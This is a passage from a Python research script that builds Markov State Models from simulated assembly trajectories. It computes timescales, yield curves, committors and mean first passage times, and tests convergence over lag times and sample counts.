record them\n for a in range(self.num_states_active):\n r = M.getrow(a)\n nz = r.nonzero()[1]\n for active_state in nz:\n #convert to state in full state space\n full_state = np.where(self.fullToNew == active_state)[0][0]\n\n #find the indices of the nonzero destinations\n active_stationary = scipy.sparse.find(M.getrow(active_state))[1]\n\n #convert these indices to the full state space\n full_stationary = []\n for i in range(len(active_stationary)):\n full_stationary.append(np.where(self.fullToNew == active_stationary[i])[0][0])\n \n #add a tuple to the absorbing set\n self.absorbing.add(tuple(full_stationary))\n self.absorbing_active.add(tuple(active_stationary))\n\n\n def computeEigenvalues(self, k = 100):\n #compute largest k eigenvalues of transition matrix over active states\n\n #compute the largest real eigenvalues of P.\n eigs = scipy.sparse.linalg.eigs(self.P_active.transpose(), k=k, which=\"LR\", maxiter=500000,\n ncv = self.num_states_active)\n\n #eigs = scipy.linalg.eig(self.P_active.toarray(), left=True, right=False)\n\n return eigs\n \n def computeTimescales(self, k):\n #use eigenvalues to compute timescales\n #use top k eigenvalues (excluding 1)\n\n #compute the largest real eigenvalues of P. \n eigs = self.computeEigenvalues()\n eigs = eigs[0] #toss out the eigenvectors\n\n #take the real part for timescales\n e = np.real(eigs)\n\n #sort the eigenvalues, get rid of the eigenvalues equal to 1\n e.sort()\n e = e[::-1]\n if (len(self.absorbing) > 0):\n K = len(self.absorbing)\n e = e[K:]\n else:\n for i in range(len(e)):\n if np.abs(e[i]-1) > 1e-8:\n K = i\n break\n e = e[K:]\n\n #take the largest k and use them to compute timescales\n E = e[0:k]\n self.timescales = - self.lag / np.log(E)\n\n return self.timescales\n\n def solveForwardEquation(self, initial, T):\n #solve forward equation until T*lag to get probability vector as fn of time\n\n #set the initial condition\n p0 = np.zeros(self.num_states, dtype=float)\n p0[initial] = 1.0\n\n #init storage for probabilities for all time and set ic\n probs = np.zeros((T+1, self.num_states), dtype=float)\n probs[0,:] = p0\n\n #iteratively multiply by transition matrix\n for i in range(T):\n probs[i+1,:] = probs[i,:] * self.P\n\n #construct temporal discretization\n t = np.linspace(0, T*self.lag, T+1)\n\n return t, probs\n\n def solveForwardEquationActive(self, initial, T):\n #solve forward equation until T*lag to get probability vector as fn of time\n\n #set the initial condition\n p0 = np.zeros(self.num_states_active, dtype=float)\n initial_active = self.fullToNew[initial]\n if (initial_active > -1):\n p0[initial_active] = 1.0\n else:\n raise(\"The chosen initial state is not part of the active set\")\n\n #init storage for probabilities for all time and set ic\n probs = np.zeros((T+1, self.num_states_active), dtype=float)\n probs[0,:] = p0\n\n #iteratively multiply by transition matrix\n for i in range(T):\n probs[i+1,:] = probs[i,:] * self.P_active\n\n #construct temporal discretization\n t = np.linspace(0, T*self.lag, T+1)\n\n return t, probs\n\n def solveForwardEquationActiveSpectral(self, initial, T):\n #solve forward equation by spectral decomp until T*lag to get \n #probability vector as fn of time\n\n #set the initial condition\n p0 = np.zeros(self.num_states_active, dtype=float)\n initial_active = self.fullToNew[initial]\n if (initial_active > -1):\n p0[initial_active] = 1.0\n else:\n raise(\"The chosen initial state is not part of the active set\")\n\n #init storage for probabilities for all time and set ic\n probs = 
np.zeros((T+1, self.num_states_active), dtype=float)\n #probs[0,:] = p0\n\n #construct temporal discretization\n t = np.linspace(0, T*self.lag*50, T+1)\n\n #get the left and right eigenvectors\n k = 250\n eigsL, vecsL = scipy.sparse.linalg.eigs(self.P_active.transpose(), k=k, which=\"LR\")\n\n eigsR, vecsR = scipy.sparse.linalg.eigs(self.P_active, k=k, which=\"LR\")\n\n print(eigsL)\n print(eigsL-eigsR)\n\n #sort them and search\n swaps = np.argsort(np.abs(eigsL))\n eig_sort = eigsL[swaps][::-1]\n print(eig_sort)\n\n #compute the spectral decomp\n for i in range(k):\n\n #get the eigenvalue \n ev = eig_sort[i]\n print(i,ev)\n # if np.abs(np.imag(ev)) > 1e-6:\n # print(\"Skipping complex\")\n # continue \n\n #get the left and right eigenvectors\n indexL = np.where(np.abs(eigsL - ev) < 1e-6)[0][0]\n indexR = np.where(np.abs(eigsR - ev) < 1e-6)[0][0]\n evL = vecsL[:,indexL]\n evR = vecsR[:,indexR]\n\n #check left eigvec for target component\n target_active = self.fullToNew[1182]\n # if (evL[target_active]/np.amax(np.abs(evL))) < 0.01:\n # print(\"Skipping unimportant\")\n # continue\n\n\n #compute inner product between p(0) and right evect. scale by evL * evR\n inner = np.dot(p0, evR)\n scale = np.dot(evR,evL)\n\n #multiply by the left eigenvector and scale\n inner *= evL / scale\n\n #add in the time evolution term, eigenvale to the power t\n probs += np.real(np.outer(np.power(ev,t/50), inner))\n\n return t, probs\n\n def plotYieldCurves(self, initial_index, target_index, final_time, animate_time,\n inv_map=None, samples_folder=None, sampling_target=None):\n #plot a yield curve for target state given an initial state and final time\n #can print out states with large probabilities if the inverse mapping is provided\n #can compare yield curve to sampling data if trajectory folder is provided\n #set the lag \n lag = self.lag\n\n #compute probability for each state as a function of time\n num_steps = int(final_time / (animate_time*lag))\n t, p = self.solveForwardEquationActive(initial_index, num_steps)\n t = t * animate_time \n\n #get a time scaling by getting number of digits\n num_digits = int(np.floor(np.log10(t[-1])))\n time_scaling = 10**num_digits\n t /= time_scaling\n\n #print out the notable final probabilities. 
Only if inv_map is provided\n if (inv_map is not None):\n\n #set the cutoff for a \"notable\" probability\n p_cut = 0.02\n print(\"Notable Final Probabilities:\")\n\n #print the state and probability for all above the threshold\n for i in range(self.num_states_active):\n if p[-1,i] > p_cut:\n state_full = np.where(self.fullToNew == i)[0][0]\n print(\"State: {}, Prob: {}\".format(inv_map[state_full], p[-1,i]))\n\n\n #plot the yield curve from initial state to target state\n new_idx = self.fullToNew[target_index]\n fig = plt.figure(1)\n ax = fig.add_subplot(111)\n plt.plot(t,p[:,new_idx])\n legend_text = [\"MSM Estimate\"]\n\n #compare to sampling data if the trajectory folder is provided\n if (samples_folder is not None and sampling_target is not None):\n \n print(\"Computing Yield Curve estimate from sampling data\")\n t_s, p_s, samples = computeSampledTargetProbability(samples_folder, \n sampling_target,\n animate_time)\n if samples > 0:\n t_s /= time_scaling\n ax.plot(t_s, p_s)\n legend_text.append(\"Brownian Dynamics ({} samples)\".format(samples))\n\n #format the plot axes and what-not\n ax.set_xlabel(r\"t/$10^{}t_0$\".format(num_digits), fontsize = 20)\n ax.set_ylabel(\"Yield\", fontsize = 20)\n\n #set num ticks\n plt.locator_params(axis='y', nbins=5)\n plt.locator_params(axis='x', nbins=4)\n\n #set tick label sizes\n ax.tick_params(axis='x', labelsize=16)\n ax.tick_params(axis='y', labelsize=16)\n\n #add legend\n ax.legend(legend_text, prop={'size':14})\n\n #remove whitespace and plot\n plt.tight_layout()\n\n #show the plot\n plt.show()\n\n return\n\n\n##################################################################\n############# Helper Functions #################################\n##################################################################\n\ndef getTrajType(type_string):\n #set boolean flags for each trajectory type using the supplied string\n\n #default each bool to false\n longT, shortT, otherT = False, False, False\n\n #check the string for identifying characters\n if (\"L\" in type_string):\n longT = True\n if (\"S\" in type_string):\n shortT = True\n if (\"D\" in type_string):\n otherT = True\n\n return longT, shortT, otherT\n\n\ndef getParameterMap():\n #read the parameter map text file to determine which parameter sets\n #correspond to which parameters\n\n #set the file location and open it\n param_file_loc = \"../MSM/parameterMap.txt\"\n param_file = open(param_file_loc, 'r')\n Lines = param_file.readlines()\n\n #init storage for the two parameter values and trajs types and read them in by line\n H = []\n P = []\n traj_types = []\n for line in Lines:\n line = line.split()\n H.append(line[1])\n P.append(line[2])\n traj_types.append(line[3])\n\n #close the parameter file and return the parameter values\n param_file.close()\n return H, P, traj_types\n\n\ndef loadStateDict(data_version = '', refine = False):\n '''\n Load the state dictionary. This is typically done from the MSM folder already, \n but ratcheting will try to do this from the simulation folder. Start by going back\n a level, then into the MSM directory to always reach it. 
\n\n If refinement is requested, also load the list of states that needed refinement\n as well as the refined dictionary.\n '''\n\n #check for refinement\n if refine:\n\n #set the file location for the refined states list\n refined_states_loc = \"../MSM/data\" + data_version + \"/refineStates\"\n refined_dict_loc = \"../MSM/data\" + data_version + \"/stateDictRefined\"\n\n try:\n\n #load the refined states\n with open(refined_states_loc, 'rb') as f:\n refineList = pickle.load(f)\n print(\"Set of refinement candidates loaded from {}\".format(refined_states_loc))\n\n #load the dict with refined states\n with open(refined_dict_loc, 'rb') as f:\n stateDict = pickle.load(f)\n\n except:\n print(\"A refinement file {} was not found.\".format(refined_states_loc),\\\n \"Please create this before performing requesting a refined discretization.\")\n raise()\n\n #otherwise load an empty refine list and the base state dictionary\n else:\n\n #create empty list and set the dict location\n refineList = []\n base_dict_loc = \"../MSM/data\" + data_version + \"/stateDict\"\n\n #load the dict with base states\n with open(base_dict_loc, 'rb') as f:\n stateDict = pickle.load(f)\n\n return stateDict, refineList\n\ndef loadMSMs(data_version = '', refine = True, restrict = [], verbose = True):\n #load the MSMs and place them in a list. Gather relevant parameters.\n\n #check if restricting the MSMs to a subset\n r_flag = False\n if len(restrict) > 0:\n if (verbose):\n print(\"Restricting MSMs to ensembles...\")\n print(restrict)\n r_flag = True\n\n #init list for MSMs\n MSMs = []\n\n #search the msm folder for all the MSMs, add to list\n msm_folder = 'msm' + data_version + '/'\n if (refine):\n name_convention = \"msmR\"\n else:\n name_convention = \"msm\"\n msm_files = fnmatch.filter(os.listdir(msm_folder), name_convention+\"*\")\n msm_files = np.sort(msm_files)\n for msm_file in msm_files:\n\n #write the file path, get the numbered index\n full_path = msm_folder+msm_file\n msm_index = int(msm_file.split(name_convention)[1])\n\n #check if being restricted\n if (r_flag and msm_index not in restrict):\n continue\n\n #load the MSM and append to list\n try:\n with open(full_path, 'rb') as f:\n msm = pickle.load(f)\n MSMs.append(msm)\n\n if (verbose):\n spaces = 6-len(msm_file)\n print(\"Loaded {}.{} Active set length is {}.\".format(msm_file,' '*spaces, len(msm.active_set)))\n except:\n print(\"Could not find {}\".format(msm_file))\n raise()\n\n #get the number of ensembles found\n K = len(MSMs)\n\n #access the energy parameters for each ensemble, (P,H)\n E2 = np.zeros(K, dtype=object)\n for k in range(K):\n p = MSMs[k].Ep\n h = MSMs[k].Eh\n E2[k] =[p,h]\n\n #return the data\n return MSMs, K, E2\n\n\n##################################################################\n############# Trajectory Extraction ############################\n##################################################################\n\n\ndef exclude(pair):\n #define rules to exclude a trajectory\n\n return False\n\n\ndef manualMapToState(stateDict, traj, frames, refine=False, refineList=[]):\n #map the trajectory in state space to a non-negative state index\n\n #init an array for the path in state space\n state_path = np.zeros(frames, dtype=int)\n\n #loop over tuples, get state index\n for i in range(frames):\n reducedState = [traj[i][0], traj[i][1], traj[i][4]]\n\n #check if performing refinement\n if refine:\n\n #check if this state is to be refined. 
if so use 5 coordinate rep\n if tuple(reducedState) in refineList:\n reducedState = traj[i]\n\n pair = tuple(reducedState)\n if (exclude(pair)):\n return np.zeros(0)\n state = stateDict[pair]\n state_path[i] = state\n\n return state_path\n\n\ndef extractTrajectories(dtrajs, folder, traj_files, stateDict, refineList = []):\n #extract trajectories stored in npy files, append to dtrajs\n\n #check for refinement\n refine = False\n if len(refineList) > 0:\n refine = True\n\n #loop over trajectories to get dtrajs\n for file in traj_files:\n\n #append the folder to get full path\n path = folder + file\n\n #filter the files under some criteria\n file_num = int(path.split('traj')[2].split('.')[0])\n if file_num < 0:\n continue\n\n #try to load the file (may fail due to blowup for given seed)\n try:\n data = np.load(path)\n except:\n continue\n\n #get the number of frames in the trajectory\n frames = len(data)\n\n #convert to an integer state trajectory\n #print(file)\n traj = manualMapToState(stateDict, data, frames, refine, refineList)\n #print(traj)\n #print(file, data[-1])\n\n #append to dtraj if there is a non-trivial trajectory\n if (len(traj)):\n dtrajs.append(traj)\n\n return\n\ndef getDtrajs(folder, stateDict, refineList, longT=True, shortT=False, otherT=False):\n #extract all the desired trajectories and return a list of them\n\n #init list to store trajectories\n dtrajs = []\n\n #check which trajectories we want to load\n if longT:\n\n #get list of all long trajectories\n try:\n trajs = fnmatch.filter(os.listdir(folder), 'traj*.npy')\n print(\"Extracting long trajectories. Found {}\".format(len(trajs)))\n extractTrajectories(dtrajs, folder, trajs, stateDict, refineList)\n\n except:\n print(\"Long trajectories requested but could not be found\")\n raise()\n\n if shortT:\n\n #get list of all short trajectories\n try:\n trajs = fnmatch.filter(os.listdir(folder+\"short/\"), 'traj*.npy')\n print(\"Extracting short trajectories. Found {}\".format(len(trajs)))\n extractTrajectories(dtrajs, folder+\"short/\", trajs, stateDict, refineList)\n\n except:\n print(\"Short trajectories requested but could not be found\")\n raise()\n \n if otherT:\n\n #get list of all other trajectories (disassembly trajs)\n\n #loop over relevant folders\n for traj_folder in glob.glob(folder+\"state12*\"):\n \n trajs = fnmatch.filter(os.listdir(traj_folder+\"/\"), 'traj*.npy')\n print(\"Extracting trajectories from {}. Found {}\".format(traj_folder, len(trajs)))\n extractTrajectories(dtrajs, traj_folder+\"/\", trajs, stateDict, refineList)\n\n \n #count how many trajectories were loaded\n num_trajs = len(dtrajs)\n if (num_trajs == 0):\n print(\"No trajectories could be loaded from folder {}. 
Exiting\".format(folder))\n raise()\n else:\n print(\"{} trajectories were loaded and discretized.\".format(num_trajs))\n\n #return the list of dtrajs\n return dtrajs\n\n\n############################################################################\n################### MSM Misc Testing #######################################\n############################################################################\n\n\ndef getTrajFolder(msm, initial_state):\n #determine which folder to search for trajectories for the specified test\n\n #get energy parameters\n p, h = msm.Ep, msm.Eh\n\n #get the base folder from these parameters\n traj_folder = \"../trajectories/P{}H{}/\".format(p,h)\n\n #get any modifications based on the starting state\n init_state_3 = (initial_state[0], initial_state[1], initial_state[-1])\n if init_state_3 != (0,0,0):\n traj_folder += \"state{}_{}_{}/\".format(*init_state_3)\n\n #return the folder\n return traj_folder\n\n\ndef MSMtesting(msm, initial_state, target_state, data_version, refine):\n #test MSM by computing a yield curve and comparing to sampling data\n\n #set animate time for the MSM and final time for the tests\n animate_time = 25\n final_time = 800000\n\n #load the dictionary of states\n stateDict, refineList = loadStateDict(data_version=data_version, refine=refine)\n num_states = len(stateDict)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #set the initial and target state indices using the stateDict\n initial_index = stateDict[initial_state]\n target_index = stateDict[target_state]\n\n #print info on the target transitions\n print(\"Ways to enter target state:\")\n print(msm.P.getcol(target_index))\n print(msm.count_matrix.getcol(target_index))\n\n print(\"Ways to exit target state:\")\n print(msm.P.getrow(target_index))\n print(msm.count_matrix.getrow(target_index))\n\n #print info on number of entries in transition matrix\n num_states = msm.num_states\n nz = msm.count_matrix.count_nonzero()\n print(\"{} nonzero entries out of {}, {} %\".format(nz, num_states*num_states, float(nz)/float(num_states)))\n\n #plot yield curves\n traj_folder = getTrajFolder(msm, initial_state)\n sampling_target = (target_state[0], target_state[1], target_state[-1])\n msm.plotYieldCurves(initial_index, target_index, final_time, animate_time, \n inv_map, traj_folder, sampling_target)\n\n return\n\n\ndef MSMtestingLoad(msm_loc,initial_state=(0,0,0), target_state=(12,30,30),\n data_version='', refine = False):\n #perform MSM testing by loading from pickle\n\n #try loading the MSM\n try:\n with open(msm_loc, 'rb') as f:\n msm = pickle.load(f)\n except:\n print(\"Could not load MSM at location {}\".format(msm_loc))\n raise()\n\n #do the testing\n MSMtesting(msm, initial_state, target_state, data_version, refine)\n\n return\n\n\n\n\ndef MSMtestingScratch(folder, lag, initial_state=(0,0,0), target_state=(12,30,30),\n data_version='', refine = False, \n longT=True, shortT=False, otherT=False):\n #do msm testing by constructing it manually\n\n #create the msm using given folder and lag\n msm = createMSM(folder, lag, data_version=data_version, refine=refine, \n longT=longT, shortT=shortT, otherT=otherT)\n\n #do the testing\n MSMtesting(msm, initial_state, target_state, data_version, refine)\n\n #save the msm so we can load it in the future\n with open(\"msm_tests/msmP{}H{}\".format(msm.Ep,msm.Eh), 'wb') as f:\n pickle.dump(msm, f)\n\n return\n\n\ndef computeSampledTargetProbability(folder, target_state, animate_time):\n #compute p(t) estimated using sampled 
trajectories\n\n #get all npy files in the given folder\n try:\n trajs = fnmatch.filter(os.listdir(folder), '*.npy')\n except:\n print(\"No such file or directory: {}\".format(folder))\n return np.array([0]), np.array([0]), 0\n\n #if none are found, return empty lists\n if (len(trajs) == 0):\n print(\"No npy files were found in {}\".format(folder))\n return np.array([0]), np.array([0]), 0\n\n #init storage\n frames = 0\n\n for npy_file in trajs:\n\n #load the npy file\n try:\n #print(npy_file)\n path = np.load(folder+npy_file)\n except:\n continue\n\n if (frames == 0): #do the first time setup\n frames = len(path)\n new_frames = frames\n p = np.zeros(frames, dtype=float)\n samples = np.zeros(frames, dtype=float)\n samples[0] = 0\n\n else: #test if later path has more frames\n new_frames = len(path)\n if new_frames > frames:\n p_new = np.zeros(new_frames)\n p_new[0:(frames)] = p\n p = p_new\n\n samples_new = np.zeros(new_frames)\n samples_new[0:(frames)] = samples\n samples = samples_new\n\n frames = new_frames\n\n count = 0\n for pair in path:\n if (pair[0] == target_state[0] and pair[1] == target_state[1] and pair[-1] == target_state[2]):\n p[count] += 1\n #break\n\n samples[count] += 1\n count += 1\n\n #get time discretization and normalize p\n t = np.linspace(0, animate_time*frames, frames)\n p = p / samples\n\n print(p)\n print(samples)\n\n return t, p, int(np.max(samples))\n\ndef computeCommittor(P, initial, target, num_states):\n #compute the committor probability for each state\n\n #convert single valued initial and target to lists\n initials = list(np.array([initial]).flat)\n targets = list(np.array([target]).flat)\n\n #init the system matrix and rhs\n R = np.array(P.todense())\n b = np.zeros(num_states)\n\n #subtract identity from P to get R\n for i in range(num_states):\n R[i][i] -= 1.0 - 1e-16\n\n #set boundary conditions\n #initial state\n for i in initials:\n for j in range(num_states):\n if j == i:\n R[i,j] = 1.0\n else:\n R[i,j] = 0.0\n\n #target state\n for t in targets:\n for j in range(num_states):\n if j == t:\n R[t,j] = 1.0\n else:\n R[t,j] = 0.0\n\n #set vector\n b[targets] = 1.0\n\n #do the solve and return the result\n x = np.linalg.solve(R,b)\n return x\n\ndef computeMFPT(P, initial, target, num_states):\n #compute mean first passage time from initial states to target states\n\n #need to solve the linear system tau=1+Q*tau\n\n #convert single valued initial and target to lists\n initials = list(np.array([initial]).flat)\n targets = list(np.array([target]).flat)\n\n #get list of absorbing states to remove\n absorbing = []\n for i in range(num_states):\n if P[i,i] > 1-3e-2:\n absorbing.append(i)\n if i in initials:\n initials.remove(i)\n\n # print(targets)\n # print(\"Absorbing: {}\".format(absorbing))\n\n #init the system matrix and rhs\n Q = np.array(P.todense())\n\n #construct Q by removing rows and columns in the target from P\n to_remove = list(set(targets) | set(absorbing))\n Q = np.delete(Q, to_remove, 0)\n Q = np.delete(Q, to_remove, 1)\n\n #solve the system\n off_target = num_states - len(to_remove)\n b = np.ones(off_target)\n A = np.identity(off_target)*(1+1e-10)-Q\n # Ainv = np.linalg.pinv(A)\n # tau = np.matmul(Ainv,b)\n tau = np.linalg.solve(A, b)\n print(A*tau)\n print(tau)\n\n #get the indexing map due to removing the target states\n new_indices = []\n count = 0\n for i in range(num_states):\n if i in targets or i in absorbing:\n count +=1\n new_indices.append(-1)\n else:\n new_indices.append(i-count)\n\n #average the mean first passage times over the 
initial states\n avg = 0\n for i in range(len(initials)):\n new_index = new_indices[initials[i]]\n value = tau[new_index]\n print(i, new_index, value)\n avg += value\n\n avg /= len(initials)\n return avg\n\n\ndef computeMFPTsampling(P, initial, target, num_states, inv_map, globalActive):\n #estimate mean first passage times by sampling\n\n #convert single valued initial and target to lists\n initials = list(np.array([initial]).flat)\n targets = list(np.array([target]).flat)\n\n #set sampling parameters\n num_samples = 100\n max_iters = 256\n\n #choose initial state at random\n i = random.choice(initials)\n\n #do sampling\n average = 0\n for sample in range(num_samples):\n current_state = i\n # input()\n for t in range(max_iters):\n\n #get the row of P cooresponding to current state\n row = P.getrow(current_state)\n row = row.A[0]\n\n #sample from the row\n current_state = np.random.choice(range(len(row)),p=row)\n # print(t,inv_map[globalActive[current_state]])\n if current_state in targets:\n print(\"Hit target in {} steps\".format(t))\n average += t+1\n break\n\n average /= num_samples\n\n return average\n\n\n\n\n\n\n##################################################################\n############# MSM Convergence Testing ###########################\n##################################################################\n\n\ndef time_scale_analysis(dtraj, LAGS, Eh, Ep, num_states, k = 10):\n #compute MSMs at various lag times, plot timescales, do markovity test\n\n #get number of tests to do and init storage for timescales\n num_lags = len(LAGS)\n timescales = np.zeros((k, num_lags), dtype=float)\n\n for i in range(num_lags):\n lag = LAGS[i]\n\n #print progress message\n print(\"Computing MSM {} of {}\".format(i+1,num_lags))\n\n M = MSM(dtraj, lag, Eh, Ep, num_states)\n t = M.computeTimescales(k)\n timescales[:,i] = np.array(t)\n\n \n #plot the timescales\n plt.figure()\n for i in range(3,k):\n plt.plot(LAGS, timescales[i])\n\n plt.show()\n\n\n return\n\ndef convergenceLag(folder, initial_state, target_state, data_version='', refine=False):\n '''\n Test convergence of the MSMs by constructing yield curves from initial_state to \n target_state as a function of lag time. 
The curves involve all the timescales\n important for that particular assembly, so this should be more robust than a \n CK test\n\n Set a selection of lag times to test apriori, construct the MSMs for each lag time,\n then save them together for later re-use.\n '''\n\n #set the desired lag times and other constant parameters\n LAGS = [1, 25, 50, 75, 100, 125, 150]\n animate_time = 25\n Ep = float(folder.split('P')[1].split('H')[0])\n Eh = float(folder.split('P')[1].split('H')[1].split('/')[0])\n\n #get the stateDict dictionary mapping\n stateDict, refineList = loadStateDict(data_version=data_version, refine=refine)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #get indices of the initial and target states\n num_states = len(stateDict)\n initial_index = stateDict[initial_state]\n target_index = stateDict[target_state]\n print(\"Target state index is {}\".format(target_index))\n print(\"There are {} states\".format(num_states))\n\n #try to load an existing collection of MSMs at the lag time\n msm_conv_data_loc = \"../MSM/msm_tests/convP{}H{}\".format(Ep,Eh)\n try:\n\n with open(msm_conv_data_loc, 'rb') as f:\n MSM_list = pickle.load(f)\n print(\"MSM convergence data loaded from {}\".format(msm_conv_data_loc))\n\n except:\n\n #create the MSMs at each lag from scratch\n MSM_list = []\n for k in range(len(LAGS)):\n lag = LAGS[k]\n M = createMSM(folder, lag, data_version=data_version, refine=refine,\n longT=True, shortT=True, otherT=True)\n MSM_list.append(M)\n\n #pickle the list of MSMs for later use\n with open(msm_conv_data_loc, 'wb') as f:\n pickle.dump(MSM_list, f)\n\n #loop over the MSM list and compute yield curves for the desired states\n target_times = []\n target_probs = []\n use_lags = [25, 125, 150]\n for k in range(len(LAGS)):\n\n lag = LAGS[k]\n if lag not in use_lags:\n continue\n\n #construct the MSM object\n M = MSM_list[k]\n\n #get the target probability evolution\n num_steps = int(800000.0 / (animate_time*lag))\n t, p = M.solveForwardEquationActive(initial_index, num_steps)\n t = t * animate_time\n t /= 1e5\n target_times.append(t)\n global_t = M.fullToNew[target_index]\n target_probs.append(p[:,global_t])\n\n #get the sampled values\n print(\"Computing fc estimate from sampling\")\n traj_folder = getTrajFolder(M, initial_state)\n sampling_target = (target_state[0], target_state[1], target_state[-1])\n t_s, p_s, samples = computeSampledTargetProbability(folder, sampling_target, animate_time)\n t_s /= 1e5\n\n #plot the data and format it\n fig = plt.figure(1)\n ax = fig.add_subplot(111)\n\n #plot sampled data\n plt.plot(t_s, p_s, '-')\n\n #plot each MSM data\n for k in range(len(target_probs)):\n plt.plot(target_times[k],target_probs[k])\n\n #label \n num_digits = 5\n ax.set_xlabel(r\"t/$10^{}t_0$\".format(num_digits), fontsize = 20)\n ax.set_ylabel(\"Yield\", fontsize = 20)\n\n #set num ticks\n plt.locator_params(axis='y', nbins=5)\n plt.locator_params(axis='x', nbins=4)\n\n #set tick label sizes\n ax.tick_params(axis='x', labelsize=16)\n ax.tick_params(axis='y', labelsize=16)\n\n #remove whitespace and plot\n plt.tight_layout()\n # plt.legend([\"Sampled data\", \"MSM Lag 1\", \"MSM Lag 25\",\"MSM Lag 50\",\"MSM Lag 75\",\n # \"MSM Lag 100\",\"MSM Lag 125\",\"MSM Lag 150\"], prop={'size':15})\n plt.show()\n\n return\n\n\ndef convergenceSamples(folder, data_version='', refine=False):\n #test the convergence of the MSM as a function of number of samples\n\n #get the stateDict dictionary mapping\n stateDict, refineList = 
loadStateDict(data_version=data_version, refine=refine)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #get info about the state space and target\n num_states = len(stateDict)\n initial_index = stateDict[(12,29,27)]\n target_index = stateDict[(12,29,27)]\n target_state = (12,29,27)\n print(\"Target state index is {}\".format(target_index))\n print(\"There are {} states\".format(num_states))\n\n #get the ensemble energies\n Ep = float(folder.split('P')[1].split('H')[0])\n Eh = float(folder.split('P')[1].split('H')[1].split('/')[0])\n\n #set lag and animation period\n lag = 100\n animate_time = 25\n num_steps = int(700000.0 / (animate_time*lag))\n\n #make list for all trajectories\n dtrajs = []\n\n #get all npy files\n trajs = fnmatch.filter(os.listdir(folder), 'traj*.npy')\n\n #append trajectories from sims to dtrajs \n print(\"Extracting long trajectories. Found {}\".format(len(trajs)))\n extractTrajectories(dtrajs, folder, trajs, stateDict)\n\n #create MSMs gradually using more data\n num_trajs = [3, 6, 12, 24, 48, 96, 188]\n target_probs = []\n for k in range(len(num_trajs)):\n nt = num_trajs[k]\n\n #construct the MSM object\n M = MSM(dtrajs[0:nt], lag, Eh, Ep, num_states)\n\n #get the target probability evolution\n t, p = M.solveForwardEquationActive(initial_index, num_steps)\n t = t * animate_time\n t_ind = M.fullToNew[target_index]\n target_probs.append(p[:,t_ind])\n\n #get the sampled values\n print(\"Computing fc estimate from sampling\")\n sampling_target = (target_state[0], target_state[1], target_state[-1])\n t_s, p_s, samples = computeSampledTargetProbability(folder, sampling_target, animate_time)\n\n #plot\n plt.figure()\n\n #plot sampled data\n plt.plot(t_s, p_s, '-')\n\n #plot each MSM data\n for k in range(len(num_trajs)):\n plt.plot(t,target_probs[k])\n\n #label \n plt.xlabel(\"Time\")\n plt.ylabel(\"Target State Probability\")\n plt.legend([\"Sampled data\", \"MSM-3\", \"MSM-6\",\"MSM-12\", \"MSM-24\",\"MSM-48\", \"MSM-96\",\"MSM-188\"])\n\n \n #show\n plt.show()\n\n return\n\n\n##################################################################################\n################## Refine State Space Discretization #############################\n##################################################################################\n\n\ndef comparePijByStartState(folder1, folder2):\n '''\n Test how transition matrix entries chage in an MSM when adding additional sampling\n data that was initialized in a different initial configuration. Compare values in the\n augmented MSM to base values, and check if they are within some multiple of the \n standard sampling error. If so, mark that state as a problem state. Return all such \n states. \n\n This serves as a test for which states the reaction coordinate used is defining\n a state ambiguously, i.e. two distinct microstates with same macrostate. 
\n '''\n\n #get the stateDict dictionary mapping\n stateDict, refineList = loadStateDict()\n num_states = len(stateDict)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #set a lag\n lag = 100\n animate_time = 25\n\n #get the base set of trajs to construct an MSM\n dtrajs = []\n trajs = fnmatch.filter(os.listdir(folder1), 'traj*.npy')\n extractTrajectories(dtrajs, folder1, trajs, stateDict)\n\n #construct the MSM object\n msm1 = MSM(dtrajs, lag, 1.2, 1.4, num_states)\n r,c = msm1.P.nonzero()\n\n #construct the second MSM with additional sampling data used and make another MSM\n trajs = fnmatch.filter(os.listdir(folder2), 'traj*.npy')\n extractTrajectories(dtrajs, folder2, trajs, stateDict)\n msm2 = MSM(dtrajs, lag, 1.2, 1.4, num_states)\n\n #init a list to store the problem states\n identified = []\n\n #set a tolerance for how many standard errors from the estimate is acceptable\n tol = 3\n\n #loop over nonzeros and print differences\n for i in range(len(r)):\n\n #get probability in this index for each MSM\n p1 = msm1.P[r[i],c[i]]\n p2 = msm2.P[r[i],c[i]]\n\n #get counts in base MSM to compute standard error\n c1 = msm1.count_matrix[r[i],c[i]]\n std = np.sqrt(p1*(1-p1)/float(c1))\n\n #check if above the tolerance for being considered\n if (np.abs(p1-p2) > tol*std and std > 1e-5):\n state1 = inv_map[r[i]]\n state2 = inv_map[c[i]]\n print(\"{} -> {}, p1 = {}, p2 = {}, std = {}\".format( \\\n state1, state2, round(p1,4), round(p2,4), round(std,4)))\n identified.append(state1)\n\n #return the identified states\n return identified\n\ndef getStatesToRefine(base_folder):\n #get a list of candidate states for refinement \n\n #list all starting states for the long sims\n start_states = [\"12_29_27\", \"12_30_30\", \"12_30_26\", \"12_31_27\", \"12_31_29\"]\n # start_states = [\"12_29_27\", \"12_30_26\", \"12_31_29\"]\n\n #try to load a file for candidate sets. if no such file, create from scratch\n set_name = \"data/refineStates\"\n try:\n with open(set_name, 'rb') as f:\n candidates = pickle.load(f)\n print(\"Set of candidates loaded from {}\".format(set_name))\n except:\n print(\"File {} not found. 
Creating candidates from scratch\".format(set_name))\n candidates = set()\n\n #loop over each pair to get states to look at \n for i in range(len(start_states)):\n for j in range(len(start_states)):\n if i != j:\n\n #set the folders containing the data\n f1 = base_folder + \"state\" + start_states[i] + \"/\"\n f2 = base_folder + \"state\" + start_states[j] + \"/\"\n\n #get the states for this pair\n print(\"Comparing data in {} to {}\".format(f1, f2))\n states = comparePijByStartState(f1, f2)\n\n #loop over and add to set\n for state in states:\n candidates.add(state)\n\n #display size of new set\n print(\"Candidate set now has {} states\".format(len(candidates)))\n\n #save the set to disk\n with open(set_name, 'wb') as f:\n pickle.dump(candidates, f)\n print(\"Wrote set of candidate states to {}\".format(set_name))\n\n\n############################################################################\n################### Create MSMs ###########################################\n############################################################################\n\ndef createMSM(folder, lag, data_version='', refine=False, longT=True, shortT=False,\n otherT=False):\n #manually construct an MSM using the trajectories in folder and specified lag\n\n #load the dictionary of states\n stateDict, refineList = loadStateDict(data_version=data_version, refine=refine)\n num_states = len(stateDict)\n\n #get the energy parameters from the folder name\n Ep = float(folder.split('P')[1].split('H')[0])\n Eh = float(folder.split('P')[1].split('H')[1].split('/')[0])\n\n #get a list of discrete trajectories using data in 